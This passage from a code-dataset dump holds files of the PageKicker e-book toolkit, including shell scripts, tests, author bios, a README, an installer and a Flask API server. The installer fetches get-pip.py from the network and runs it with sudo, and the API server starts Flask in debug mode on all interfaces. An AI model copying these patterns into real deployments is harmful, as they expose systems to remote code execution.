2\n;;\n--infile=*)\ninfile=${1#*=}\nshift\n;;\n--outfile)\noutfile=$2\nshift 2\n;;\n--outfile=*)\noutfile=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$infile\" ]; then\n echo \"ERROR: option '--in[infile]' not given. See --help\" >&2\n exit 1\nelif [ ! \"$outfile\" ] ; then\n\techo \"ERROR: option '--outfile[outfile]' not given. See --help\" >&2\n \texit 1\nfi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 tmp/$uuid\n\tmkdir -p -m 755 tmp/$uuid/montageur\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\n\n. ../\"conf/config.txt\"\necho \"running in $environment\" | tee --append $xform_log\n\n. $scriptpath\"includes/set-variables\"\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION | tee --append $sfb_log\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nexport PATH=$PATH:/opt/bitnami/java/bin\n\n# echo \"PATH is\" $PATH\n\necho \"beginning to screen out naughty and duplicate seeds\" >> $sfb_log\n\nrm $outfile # clean up from last time overwrites previous outfile\n\nwhile read -r line; do \n\nif grep -q \"$line\" \"seeds/disallowed-seeds.txt\"\nthen \n\techo \"ncp_err_code:disallowed the seed \"$line \"was disallowed by policy\" | tee --append $sfb_log\n # figure out how to send an error report to the user here\n \n\nelif grep -q \"$line\" $LOCAL_DATA\"seeds/history/seed-history.csv\"\nthen \n\techo \"ncp_err_code:duplicate the seed \"$line \" has previously been submitted to PageKicker\" | tee --append $sfb_log\n\n # figure out how to send an error report to the user here\n\nelse\n\techo \"ncp_err_code:ok\" $line | tee --append $LOCAL_DATA/seeds/\"allowed/allowed-history.txt\"\n\techo \"$line\" >> \"$outfile\"\nfi\n\ndone<\"$infile\" \n\nexit 0\n" }, { "alpha_fraction": 0.6031909584999084, "alphanum_fraction": 0.6160576343536377, "avg_line_length": 20.82022476196289, "blob_id": "5472482d931bcc379ab0d6def69f24a85913cd7d", "content_id": "4998e9788225dae5df4515c101fdc1f3be89636b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1943, "license_type": "permissive", "max_line_length": 107, "num_lines": 89, "path": "/scripts/PDF_renamer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# renames files per PDF title metadata\n\n# this script has not been heavily tested but is nondestructive, i.e. it only makes changes on copied files\n\n# input: path to directory containing PDF files\n# output: directory containing same files renamed with document title from PDF metadata\n# requires pdftk\n\n# relative path to PageKicker config file here (run from $scriptpath)\n\n. 
../conf/config.txt\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires directory name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfdir)\npdfdir=$2\nshift 2\n;;\n--pdfdir=*)\npdfdir=${1#*=}\nshift\n;;\n--renamed_files_dir)\nrenamed_files_dir=$2\nshift 2\n;;\n--renamed_files_dir=*)\nrenamed_files_dir=${1#*=}\nshift\n;;\n\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$pdfdir\" ]; then\n\techo \"ERROR: option '--pdfdir[pdfdir]' not given. See --help\" >&2\n \texit 1\nelif [ ! \"$renamed_files_dir\" ]; then\n \techo \"ERROR: option '--renamed_files_dir[renamed_files_dir]' not given. See --help\" >&2\n exit 1\nelse\n\techo \"proceeding\"\nfi\n\nmkdir -p -m 755 \"$renamed_files_dir\"\n\ncd \"$pdfdir\"\ni=1\nfor file in *.pdf\n\t\ndo\n\ttitle=`pdftk $file dump_data output| sed -n '/InfoKey: Title/{n;p}'`\n\techo \"title is\" $title\n\tcd \"$scriptpath\"\n\tif [ -z \"$title\" ]; then\n\t\tcp \"$pdfdir\"/\"$file\" \"$renamed_files_dir\"\n\telse\n\t\tsafe_file_name=$(echo \"$title\" | cut -d\":\" -f2 | sed -e 's/[^A-Za-z0-9._-]/_/g' -e '1s/^.//' )\n\t\tj=$( printf \"%04d\" \"$i\" )\n\t\tcp \"$pdfdir\"/\"$file\" \"$renamed_files_dir\"/\"$safe_file_name\"-\"$j\".pdf\n\tfi\n\t(( i++ ))\n\tcd \"$pdfdir\"\ndone\ncd $scriptpath\necho \"renamed files in new directory $renamed_files_dir\"\nls -lart \"$renamed_files_dir\"\n\n" }, { "alpha_fraction": 0.658450722694397, "alphanum_fraction": 0.6678403615951538, "avg_line_length": 29.428571701049805, "blob_id": "af698539a4d7f97da9832c7c939d51052d475ce2", "content_id": "4bd2a5042900d537777fe5603fd3e72679905cfc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 852, "license_type": "permissive", "max_line_length": 88, "num_lines": 28, "path": "/test/memecard_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# version1.0 test suite\n# runs test of all production-visible scripts\n\necho \"------------------------version 1.0-------------------------------\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\necho \"$import_available_on_machine importing\"\n. 
includes/set-variables.sh\n\nbin/memecard.sh --infile ../test/data/FBadvisory.md --tldr \"Addicted to Facebook?\"\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 55, "blob_id": "5a32e55b021f1425d3ef2c9f56a5701d736a72eb", "content_id": "75c6d73a47761389ee493da748004e1e596aaddc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 56, "license_type": "permissive", "max_line_length": 55, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Grognard_bio.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Gustavious Grognard is a veteran wargamer and military history fan.\n" }, { "alpha_fraction": 0.8468468189239502, "alphanum_fraction": 0.8468468189239502, "avg_line_length": 110, "blob_id": "3b403b11959b88cead777a2b203fce40b9d68cbd", "content_id": "ce66a6024917dbcaceededd530ea936edc4d051f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 111, "license_type": "permissive", "max_line_length": 110, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/John.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "John is a board-certified clinical psychologist and Diplomate of the American Board of Professional Psychology.\n" }, { "alpha_fraction": 0.7518022656440735, "alphanum_fraction": 0.7528321146965027, "avg_line_length": 484, "blob_id": "abacc1ca0d09ad7d1146ebe57f984fadc0029be2", "content_id": "238eb290dc761dcffe7372040a0a4574311eb05a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 971, "license_type": "permissive", "max_line_length": 728, "num_lines": 2, "path": "/conf/jobprofiles/authorbios/Hollywood_kids.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Two Hollywood kids, Kate Beswick and John Harding, with movie picture parents, keep running into each other. At elementary school, Hawthorne, in Beverly Hills, I was an illegal. We had just arrived in LA and lived at the Montecito in Hollywood. To get me into Hawthorne, my father got me a fake Beverly Hills address - Dalton Trumbo's house. He took me by to show me the house so I could answer questions, if asked. My dad said, \"We can trust this guy because he's a Commie like us.\" \"A Commie lives in a mansion like that?\" I said. Dad said, \"What do you think, all Commies are poor?\" So, each day I would sneak from Hollywood to Beverly Hills and after school, I would sneak back to Hollywood. That was the beginning of my life in crime.\nOMG! So you stayed at the Montecito, as well. And, YES, we had a pull-down bed. Did you and I sleep in the same bed? - at the Montecito, I mean. I was in the 5th grade at Hawthorne, along with Warner Leroy. Did we pass each other in the hallway? 
\n" }, { "alpha_fraction": 0.5363534688949585, "alphanum_fraction": 0.5475391745567322, "avg_line_length": 29.827587127685547, "blob_id": "39c75ea3a495f6bd38ecdb7d72769c8849e33277", "content_id": "9677d0383149d9892cc38ba90f14fa0f2c79fe7a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1788, "license_type": "permissive", "max_line_length": 75, "num_lines": 58, "path": "/api/api-server.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 7 18:44:35 2016\n\n@author: fred\n\"\"\"\nimport subprocess\nimport os\nimport psutil\nfrom flask import Flask, request, send_from_directory\nimport configparser\nconfig = configparser.ConfigParser()\nconfig.read(\"config.ini\")\ncommandpath = config.get(\"Paths\", \"commandpath\")\nmycwd = config.get(\"Paths\", \"mycwd\")\nprint('local commandpath and working directory are ' + commandpath, mycwd)\n\n\[email protected]('/api', methods=['GET', 'POST'])\ndef buy_bookbuild():\n\n key1 = str(request.args.get('key1'))\n command = [ commandpath, '-S', key1]\n status = subprocess.check_call(command, cwd = mycwd)\n status = ('exiting with status ' + str(status))\n # print(status)\n return send_from_directory('/tmp/pagekicker/', 'delivery.epub')\n\n\n# Initialize and run the server\nif __name__ == '__main__':\n\n import click\n\n @click.command()\n @click.option(\"-d\", \"--daemon\", default=False, is_flag=True,\n help=\"Run in daemon mode.\")\n\n def run(daemon):\n if daemon:\n pid_file = './api-server.pid'\n if os.path.isfile(pid_file):\n pid = int(open(pid_file).read())\n os.remove(pid_file)\n try:\n p = psutil.Process(pid)\n p.terminate()\n except:\n pass\n try:\n p = subprocess.Popen(['python3', 'api-server.py'])\n open(pid_file, 'w').write(str(p.pid))\n except subprocess.CalledProcessError:\n raise ValueError(\"error starting api-server.py daemon\")\n else:\n print(\"api-server running...\")\n app.run(host='::', port=5035, debug=True)\n run()\n" }, { "alpha_fraction": 0.7354838848114014, "alphanum_fraction": 0.7383512258529663, "avg_line_length": 26.899999618530273, "blob_id": "7bf8b0c04f9767d279ba4aa942a3677db7ff65f3", "content_id": "ea86bfd1e8113b3e9bebe149b2ea9d37cab46cf7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1395, "license_type": "permissive", "max_line_length": 214, "num_lines": 50, "path": "/README.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# PageKicker Algorithmic Publishing Toolkit\n\nAlgorithmic book creation toolkit: push a button, build a unique new e-book using permissioned content.\n\nPageKicker accepts explicit or implicit user specifications, searches permissioned content, fetches it, analyzes, designs, assembles, converts, and distributes the results in ebook, web, document, or mobile format.\n\n### Install on Debian-Ubuntu Linux\n\n```\ncd ~\n\ngit clone https://github.com/fredzannarbor/pagekicker-community.git\n\ncd pagekicker-community\n\n./simple-install.sh`\n```\n\n### Quick Start\n\nRun this example job:\n```\ncd ~/pagekicker-community/scripts # all commands must be launched from this directory\n\nbin/builder.sh --seedsviacli \"Fancy Bear; Kaspersky\" --booktitle \"Cybersecurity Demo Book\" --covercolor \"red\"\n\n```\n\n- runs verbosely by default, to make it run silently add 1> /dev/null to end of command\n- searches wikipedia by default\n```\n\n- 
look in the most recently created tmp directory for results\n\n`ls -lart /tmp/pagekicker`\n\n- complete books begin with an SKU, e.g. 100*** and end with .docx, etc.\n\n\n### Experiment by adding some useful command line options\n\n`bin/builder.sh --seedsviacli \"Fancy Bear; Kaspersky\" --booktitle \"Wapack Demo Book\" --expand_seeds_to_pages \"yes\"`\n\n- The system will spider out to all page hits for these key words\n\n`--covercolor \"Red\"`\n\n`--coverfont \"Arial\"`\n\n`--editedby \"Charles Dickens\"`\n" }, { "alpha_fraction": 0.7055016160011292, "alphanum_fraction": 0.7055016160011292, "avg_line_length": 9.655172348022461, "blob_id": "7a48e7e26a6e9294c5e23358d32a7add8462fe00", "content_id": "6b083b975675cfb6535c72ba81d7cd09524b86d5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 309, "license_type": "permissive", "max_line_length": 61, "num_lines": 29, "path": "/scripts/includes/readingstype.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# add if logic for price rx rows\n\n# if logic for readingstype\n\n# search-based book\n\ncase $booktype in\n\nReader)\n\necho \"booktype is\" $booktype\nreadingstype=\" Reader\"\n\n;;\n\nExplorer)\n\nreadingstype=\" Explorer\"\n\n;;\n\n*)\n\nreadingstype=$booktype\n;;\n\nesac\n\necho \"readingstype is \" $readingstype | tee --append $sfb_log\n" }, { "alpha_fraction": 0.669803261756897, "alphanum_fraction": 0.6809238791465759, "avg_line_length": 29.763158798217773, "blob_id": "d5de0b7ef2e95ee9255c5b1efdcc99e8b89d0997", "content_id": "f9747416a6ce248976c9ecff18e82ac7d5d68c4b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1169, "license_type": "permissive", "max_line_length": 107, "num_lines": 38, "path": "/test/wapack_test.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# version1.0 test suite\n# runs test of all production-visible scripts\n\necho \"------------------------version 1.0-------------------------------\"\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\necho \"$import_available_on_machine importing\"\n. includes/set-variables.sh\n\n../test/paella.sh\n../test/decimator-test.sh ../test/data/Zalasiewicz_Technosphere_2016.pdf \"pioneering metrics and inventory\"\n#bin/xform.sh \"$SFB_HOME\"test/data mettan.xml\n\nif [ \"$import_available_on_machine\" = \"no\" ] ; then\n\t(>&2 echo \"importing not available on this machine\")\nelse\n\t\t. 
../test/import-paella.sh\nfi\n\nbin/memecard.sh --infile ../test/data/FBadvisory.md --tldr \"Addicted to Facebook?\"\n" }, { "alpha_fraction": 0.5027322173118591, "alphanum_fraction": 0.5355191230773926, "avg_line_length": 14.333333015441895, "blob_id": "b6ae4e0796774cf1636602ada85343b2072b71cd", "content_id": "038d69c9c1540c5e1695beb51f63f79575f50a69", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 183, "license_type": "permissive", "max_line_length": 75, "num_lines": 12, "path": "/scripts/random-line.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nif [ \"$1\" ]; then\n\n WORDLINE=$((($RANDOM * $RANDOM) % $(wc -l $1 | awk '{print $1}') + 1))\"p\"\n sed -n $WORDLINE $1\n\nelse\n echo \"USAGE: random_line.sh $FILE\"\nfi\n\nexit 0" }, { "alpha_fraction": 0.766331672668457, "alphanum_fraction": 0.786432147026062, "avg_line_length": 397, "blob_id": "5784f314e182ad42c500fba529787d95fef4dfb0", "content_id": "c30f8d59df8c8b82e3b05a65f2d49535f254efaf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 402, "license_type": "permissive", "max_line_length": 397, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/Otzi.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "This book was assembled with pride by PageKicker robot <b>Ötzi</b>. Ötzi's inspiration was a man who lived around 3,300 BCE and died by violence in the Ötzal Alps, where his mummified body was subsequently discovered in September 1991. Robot Ötzi enjoys reading and writing about copper smelting, hunting, tattoos wild goats, and the Alps, and (in his spare time) watching \"The Big Bang Theory\".\n" }, { "alpha_fraction": 0.5302663445472717, "alphanum_fraction": 0.6125907897949219, "avg_line_length": 10.44444465637207, "blob_id": "a0599b40ca61aa3f4f397f98f142de52a1c603ec", "content_id": "2a7b21e5774d07171d4225fb86c8c9dbbd6879ed", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 413, "license_type": "permissive", "max_line_length": 34, "num_lines": 36, "path": "/scripts/includes/old.pricing.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#pricing logic\n\n# echo \"doccount is\" $doccount\n\necho \"price is \" $price\necho \"doccount is \"$doccount\n\nif [ \"$doccount\" -lt 9 ] ; then\n\n\tprice=0.99\n\nelif [ $doccount -lt 19 ] ; then\n\n\tprice=0.99\n\nelif [ $doccount -lt 49 ] ; then\n\n\tprice=2.99\n\nelif [ $doccount -lt 99 ] ; then\n\n\tprice=4.99\n\nelif [ $doccount -lt 249 ] ; then\n\n\tprice=4.99\n\nelif [ $doccount -lt 499 ] ; then\n\n\tprice=4.99\n\nelse\n\n\tprice=4.99\n\nfi\n\n" }, { "alpha_fraction": 0.7057546377182007, "alphanum_fraction": 0.7133550643920898, "avg_line_length": 34.38461685180664, "blob_id": "ea08a7576e9fb6e22bf720ff3319a709945bd248", "content_id": "75db2f1a690ec63874fedf482e6e9be46809651a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 921, "license_type": "permissive", "max_line_length": 141, "num_lines": 26, "path": "/scripts/includes/fetch-search-results.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\twhile IFS='\t' read url title description\n\tdo\t\n\n\techo 'processing fetch lists' \n\n\techo \"url is\" 
$url\n\twikiurl=$(echo $url | sed -e 's/.*wiki\\///')\n\techo \"wikiurl is\" $wikiurl\n\techo \"title is \" $title\n\techo \"description is\" $description\n\n\tfetchurlbase=\"http://\"$wikilocale\".wikipedia.org/w/api.php?action=parse&format=json&page=\"\n\techo \"fetchurlbase is\" $fetchurlbase \n\tendfetchurl=\"&mobileformat=html&noimages=\"\n\tfetchurl=$fetchurlbase$wikiurl$endfetchurl\n\techo \"url to be fetched is\" $fetchurl\n\n\tcurl --silent --connect-timeout 15 --max-time 45 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/wiki/$count.json $fetchurl 1> /dev/null\n\n\techo \"fetched document from\" $fetchurl \"using curl and saved as tmp/\"$uuid/wiki/$count\".html\" \n\n\techo \"number of docs fetched so far on seed\" $seed \"is \" $count \"out of \" $doccount \n\tcount=$((count+1))\n\n\tdone <fetch/$uuid/safesearchresults.txt\n" }, { "alpha_fraction": 0.5948991775512695, "alphanum_fraction": 0.6126927733421326, "avg_line_length": 21.08733558654785, "blob_id": "5d766174c1a06a4e1615b753e239060ba5926ed2", "content_id": "92dece3cc9c93f48ba51e520ab66eda2685e834e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5058, "license_type": "permissive", "max_line_length": 101, "num_lines": 229, "path": "/complex-install.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# This is the complex install script for PageKicker.\n#\n\n# NOT YET WORKING, USE simple-install.sh INSTEAD!!\n###########\n\nBLACK='\\033[30;1m'\nRED='\\033[91;1m'\nGREEN='\\033[32;1m'\nCYAN='\\033[36;1m'\nRESET='\\033[0m'\n\nprint_step() {\n printf \"$BLACK$1$RESET\\n\"\n}\n\nprint_error() {\n printf \"$RED$1$RESET\\n\"\n}\n\nprint_warning() {\n printf \"$CYAN$1$RESET\\n\"\n}\n\nprint_good() {\n printf \"$GREEN$1$RESET\\n\"\n}\n\nprogram_exists() {\n if ! type \"$1\" > /dev/null 2>&1; then\n return 1\n else\n return 0\n fi\n}\n\npip3_package_exists() {\n python3 -c \"import $1\" 2> /dev/null && return 0 || return 1\n}\n\nspinner() {\n while true; do\n printf '\\\\\\b'\n sleep 0.1\n printf 'l\\b'\n sleep 0.1\n printf '/\\b'\n sleep 0.1\n printf -- '-\\b'\n sleep 0.1\n done\n}\n\nprint_and_run(){\n case \"$1\" in\n *sudo*) sudo -l > /dev/null ;;\n esac\n print_step \"$1\"\n spinner &\n spinner_pid=$!\n $1\n kill $spinner_pid\n wait $spinner_pid 2> /dev/null\n printf ' ' # clear spinner\n printf '\\n'\n}\n\nsystemctl_or_service(){\n if program_exists \"systemctl\"; then\n print_and_run \"sudo systemctl ${1} ${2}.service\"\n else\n print_and_run \"sudo service ${2} ${1}\"\n fi\n}\n\ninstall_dependencies_debian_linux(){\n print_step \"Installing PageKicker and its dependencies on your Debian/Ubuntu Linux...\"\n APT_FLAG=0\n arch=$(uname -m)\n\n if ! 
program_exists \"sudo\"; then\n\tapt-get install -q -y sudo\n fi\n\n # check for /usr/bin/pip3\n if [ \"$(which pip3)\" = \"\" ]; then\n # pip3 incompleteread fix\n sudo apt-get remove -y python3-requests python3-pip\n wget https://bootstrap.pypa.io/get-pip.py\n sudo python3 get-pip.py\n sudo rm get-pip.py\n fi\n\n if [ \"$(which pip3)\" = \"/usr/bin/pip3\" ]; then\n # pip3 incompleteread fix\n sudo apt-get remove -y python3-requests python3-pip\n wget https://bootstrap.pypa.io/get-pip.py\n sudo python3 get-pip.py\n sudo rm get-pip.py\n fi\n\n if pip3_package_exists \"setuptools\"; then\n sudo pip3 uninstall -y setuptools\n fi\n\n if [ \"$APT_FLAG\" = \"0\" ]; then\n print_and_run \"sudo apt-get -q update\"\n fi\n\n\n\n # install fonts\n\n # need /usr/share/fonts/truetype/ttf-dejavu\n\n # create directory structure\n\n mkdir -m 755 ~/.pagekicker\n mkdir -m -p /tmp/pagekicker\n\n # create local-data directory structure\n\n # get master repository\n\n cd ~\n git clone https://github.com/fredzannarbor/pagekicker-community.git\n\n # install python dependencies\n\n cd ~/pagekicker-community\n pip install -r requirements.txt\n\n # installs ubuntu dependencies\n\n . apt-install.sh \n\n # get lib programs\n\n . get-lib.sh # fetches third party apps stored in PageKicker scripts/lib\n\n # set up imagemagick configuration\n\n . magick-setup.sh\n\n}\n\ninstall_optional_dependencies(){\n\n# Magento if needed\n\n# wget bitnami magento stack\n# sudo apt-get install xmlstarlet\n# Social media connectivity\n\n sudo apt-get install ruby-dev\n sudo gem install t\n sudo gem install facebook-cli\n # see https://github.com/specious/facebook-cli for info on how to authorize\n# mysql-client & mysql-server needed in future but not right now\n }\n\nverify_installation(){\n printf \"Verifying $1...\"\n if ! program_exists $1; then\n print_error \"[FAIL]\"\n fail=\"y\"\n else\n print_good \"[PASS]\"\n fi\n}\n\nverify_installation_all(){\n print_step \"Verifying installation\"\n fail=\n verify_installation \"python3\"\n verify_installation \"pip3\"\n\n if [ -z $fail ]; then\n print_good \"You have successfully installed PageKicker!\"\n print_step \"\"\n print_step \"\"\n exit 0\n else\n print_error \"Installation failed. 
Please contact support at [email protected]\"\n exit 1\n fi\n}\n\nsuggest_locale(){\n print_warning \"Warning: If your computer's locale is not US based\"\n print_warning \"Please set the following environment variables:\"\n print_step \"\\texport LC_ALL=C.UTF-8\"\n print_step \"\\texport LANG=C.UTF-8\"\n}\n\nAPI_warning(){\n print_warning \"To test the default system, you will need a Wikipedia API key.\"\n print_step \"Go to https://www.mediawiki.org/wiki/API:Login.\"\n}\n\nmain() {\n trap 'kill $spinner_pid; printf \"\\n\"; verify_installation_all; exit 1' 2\n # checks the system type and calls system specific install functions\n UNAME=$(uname)\n case \"${UNAME:-nil}\" in\n Linux)\n if program_exists \"apt-get\"; then\n install_dependencies_debian_linux\n else\n print_error \"Sorry, your system does not have either apt-get or yum package manager.\"\n exit 1\n fi\n ;;\n *)\n print_error \"Sorry, $UNAME is currently not supported via this installer.\"\n exit 1\n ;;\n esac\n\n # test whether to install optional dependencies for Magento & social networking\n # install_optional_dependencies\n\n suggest_locale\n verify_installation_all\n API_warning\n}\n\nmain\n" }, { "alpha_fraction": 0.7012090086936951, "alphanum_fraction": 0.7374784350395203, "avg_line_length": 26.272727966308594, "blob_id": "b2c60b97986223b2b3968b11b46fb90be30ce530", "content_id": "758496488a10073f0bf17eca6cf4ce5a09945bd9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 579, "license_type": "permissive", "max_line_length": 80, "num_lines": 22, "path": "/scripts/bin/setup.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n\n# run this on first use but after configuring \n\n. 
../conf/config.txt\n\n# the builder and create-catalog-entry scripts expect these directories to exist\n\n\n# subdirectories in Magento that do not exist in core Magento without plugins\n\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/import\" \nmkdir -p -m 755 $SFB_MAGENTO_HOME\"var/export\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms\"\nmkdir -p -m 755 $SFB_MAGENTO_HOME\"media/webforms/xml\"\n\n# subdirectories in TMPDIR\n\nmkdir -p -m 755 $TMPDIR\"pagekicker\"\nmkdir -p -m 755 $TMPDIR\"actual_builds\"\nmkdir -p -m 755 $TMPDIR\"seeds\"\n\n" }, { "alpha_fraction": 0.578180193901062, "alphanum_fraction": 0.6099823117256165, "avg_line_length": 23.354839324951172, "blob_id": "de1ef89ced774f7a5bae7af1355af954909391ea", "content_id": "ec23c8902d56488e07d435e2356fc97f0395f8a0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2264, "license_type": "permissive", "max_line_length": 47, "num_lines": 93, "path": "/scripts/bin/csv_to_metadata.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 22 11:16:16 2015\n\n@author: fred\n\"\"\"\nimport csv\nimport sys\nimport os\nfrom subprocess import call\n\n\nf = sys.argv[1]\nuuid = sys.argv[2]\nrow_no = int(sys.argv[3])\ntmpdir=\"/tmp/pagekicker/\"\nif not os.path.exists(tmpdir):\n os.makedirs(tmpdir)\nfolder = tmpdir+uuid\ncsvfolder = folder+'/csv/'\nif not(os.path.exists(csvfolder)):\n os.makedirs(csvfolder)\ndestination1 = folder + '/csv/row.editedby'\n#destination2 = folder + '/csv/row.price'\ndestination3 = folder + '/csv/row.description'\ndestination4 = folder + '/csv/row.product_name'\n#destination5 = folder + '/csv/row.jobprofile'\ndestination6 = folder + '/csv/row.seeds'\ndestination7 = folder + '/csv/row.imprint'\n#destination8 = folder + '/csv/row.catid'\n\n#destination1 = 'row.editedby'\n#destination2 = 'row.price'\n#destination3 = 'row.description'\n#destination4 = 'row.product_name'\n#destination5 = 'row.jobprofile'\n#destination6 = 'row.seeds'\n#destination7 = 'row.imprint'\n#destination8 = 'row.catid'\n\nf = open(f, 'rb')\nf1 = open(destination1, 'w')\n#f2 = open(destination2, 'w')\nf3 = open(destination3, 'w')\nf4 = open(destination4, 'w')\n#f5 = open(destination5, 'w')\nf6 = open(destination6, 'w')\nf7 = open(destination7, 'w')\n#f8 = open (destination8, 'w')\n\n\nreader = csv.reader(f)\n# print row_no #debug\ntry:\n rows = list(reader)\n #print rows[row_no]\n #print rows[row_no]\n editedby = rows[row_no][0]\n #price = rows[row_no][1]\n description = rows[row_no][1]\n product_name = rows[row_no][2]\n #jobprofile = rows[row_no][4]\n seeds = rows[row_no][3]\n imprint = rows[row_no][4]\n #catid = rows[row_no][7]\n print(editedby)\n #print price\n print(description)\n print(product_name)\n #print jobprofile\n print(seeds)\n print(imprint)\n # print catid\n f1.write(editedby)\n # f2.write(price)\n f3.write(description)\n f4.write(product_name)\n #f5.write(jobprofile)\n f6.write(seeds)\n f7.write(imprint)\n # f8.write(catid)\n # call ([\"ls\", \"-l\"])\n\nfinally:\n f.close() \n f1.close()\n #f2.close()\n f3.close()\n f4.close()\n #f5.close()\n f6.close()\n f7.close()\n # f8.close()" }, { "alpha_fraction": 0.7027027010917664, "alphanum_fraction": 0.7038778066635132, "avg_line_length": 35.956520080566406, "blob_id": "abec6d0502522c5b5279b251753c609b80772742", "content_id": "5323c579b3fa517d8ed47e63ae85e95b9273daea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, 
